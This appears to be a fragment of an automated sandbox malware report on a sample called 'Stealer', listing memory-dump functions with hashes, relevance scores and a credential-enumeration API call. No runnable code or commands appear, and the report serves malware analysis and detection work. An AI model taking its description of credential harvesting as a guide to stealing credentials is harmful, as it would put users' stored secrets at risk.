                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID: CredEnumerate
                                                                              • String ID:
                                                                              • API String ID: 3404281133-0
                                                                              • Opcode ID: 771d3109a86ac03c69811532fa6d5c3fb337f3cbf296a24b41a0761931289490
                                                                              • Instruction ID: 60d29fe23c76b5355e681143aa81227a10eeebca850fdf7f78022863a6a5929d
                                                                              • Opcode Fuzzy Hash: 771d3109a86ac03c69811532fa6d5c3fb337f3cbf296a24b41a0761931289490
                                                                              • Instruction Fuzzy Hash: 3931D331908A188FDB18DB9C98457B977E5EBA8711F00426FD04ED3692CB70B8558BD1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 000007FE93D81068 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4S_^
                                                                              • API String ID: 0-2164727147
                                                                              • Opcode ID: 6a792e58f49af0f9c723ebbe82d8804ac49492b82202f5fdb867c700f02a022e
                                                                              • Instruction ID: 5da6c1f7689493a76d0d706569803b793ae696e31383ec072c3b95a9329e2452
                                                                              • Opcode Fuzzy Hash: 6a792e58f49af0f9c723ebbe82d8804ac49492b82202f5fdb867c700f02a022e
                                                                              • Instruction Fuzzy Hash: C9515F2391CA721DF251727DB4867FD7B8C9BD1B78F0084B7E14AC90AB9C08668663F5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D8C509 Relevance: .4, Instructions: 418COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5a8bff71dc608af0d015e5de3efc391440fff4d1e3f0c5aa976ceffb82664789
                                                                              • Instruction ID: 7b9b5805f0d174719325ff450db41410423ba13810fbd92bdbc04d7bf74bdeeb
                                                                              • Opcode Fuzzy Hash: 5a8bff71dc608af0d015e5de3efc391440fff4d1e3f0c5aa976ceffb82664789
                                                                              • Instruction Fuzzy Hash: 11D1B770918A8D8FEBA8DF28CC557F977D1FB99301F14426ED84EC7691CB74A8418B82
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D81008 Relevance: .2, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fa453ecbc3445e0dc1f4c9cdf6fb7a8a41dbecc6ccb0968d2ca4c169da526fd5
                                                                              • Instruction ID: 03c803b80b9c2dbbbfa5c7d1506590d8a626e6fa07ccabd6c5581d45d2ef567f
                                                                              • Opcode Fuzzy Hash: fa453ecbc3445e0dc1f4c9cdf6fb7a8a41dbecc6ccb0968d2ca4c169da526fd5
                                                                              • Instruction Fuzzy Hash: CD616F2391CA721DF55172ADB4863FD7B8C9BD1B38F0090B7E149C90AB9C08358563F5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D81020 Relevance: .2, Instructions: 243COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ff53647ac3653602406065aaa1cb17a3a45c8f9db2af78dd36c5b7087df93dd4
                                                                              • Instruction ID: 41b691782a499637c6127a77f6954e50e326add18ca72ed8fef0af69f8319774
                                                                              • Opcode Fuzzy Hash: ff53647ac3653602406065aaa1cb17a3a45c8f9db2af78dd36c5b7087df93dd4
                                                                              • Instruction Fuzzy Hash: BF614E2391DA721DF1517269B4866FD6B8C9BD1B78F0090B7E14AC90AB9C08368663F5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D81028 Relevance: .2, Instructions: 241COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 13dd81e3e09a9c17fc92303aa030607d5b930e8b898f2c53c762f9df59130755
                                                                              • Instruction ID: b596417c6c02029f04b341da70a1ab409bd366af0540aa0c82e31823bcb75813
                                                                              • Opcode Fuzzy Hash: 13dd81e3e09a9c17fc92303aa030607d5b930e8b898f2c53c762f9df59130755
                                                                              • Instruction Fuzzy Hash: 64514D2391DA721DF151727DB4867FD6B8C9BD1B78F0094B7E14AC90AB9C08328663F5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D81030 Relevance: .2, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dd13d152a4af802b69e46241d98e0bd07f2bc8a6c6cebeafbe4bb24173919ddc
                                                                              • Instruction ID: 2f4d167279beffe64b4ed893e6bccffba95fd2e79960703fb74b72804028700d
                                                                              • Opcode Fuzzy Hash: dd13d152a4af802b69e46241d98e0bd07f2bc8a6c6cebeafbe4bb24173919ddc
                                                                              • Instruction Fuzzy Hash: D7514C2391DA721DF1517269B4867FD6B8C9BD1B78F0084B7E14AC90AB9C08328663F6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D81070 Relevance: .2, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5e49df15c4177477591e5ebb4ad76f7d0fb8c7541fac253d1db8701cf89976e0
                                                                              • Instruction ID: 35648efead5fa4a68b898db7ba5133b1ff5648ee25f71399c95c2047fc876976
                                                                              • Opcode Fuzzy Hash: 5e49df15c4177477591e5ebb4ad76f7d0fb8c7541fac253d1db8701cf89976e0
                                                                              • Instruction Fuzzy Hash: E0514E2391CA721DF251727DB4867FD7B8C9BD1B78F0084B7E14AC90AB9D08628663F5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%